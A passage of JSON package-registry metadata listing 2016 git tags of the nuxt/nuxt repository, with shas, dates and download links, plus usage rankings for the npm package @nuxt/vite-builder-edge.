ull,"purl":"pkg:github/nuxt/nuxt@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-02-13T18:02:57.535Z","dependent_packages_count":2,"downloads":5593,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":1.386107926022107,"dependent_repos_count":10.767935900085632,"dependent_packages_count":8.786228889746779,"stargazers_count":0.16519994711762306,"forks_count":0.5466428312764772,"docker_downloads_count":1.2818924321171392,"average":3.822334654394293},"purl":"pkg:npm/%40nuxt/vite-builder-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/v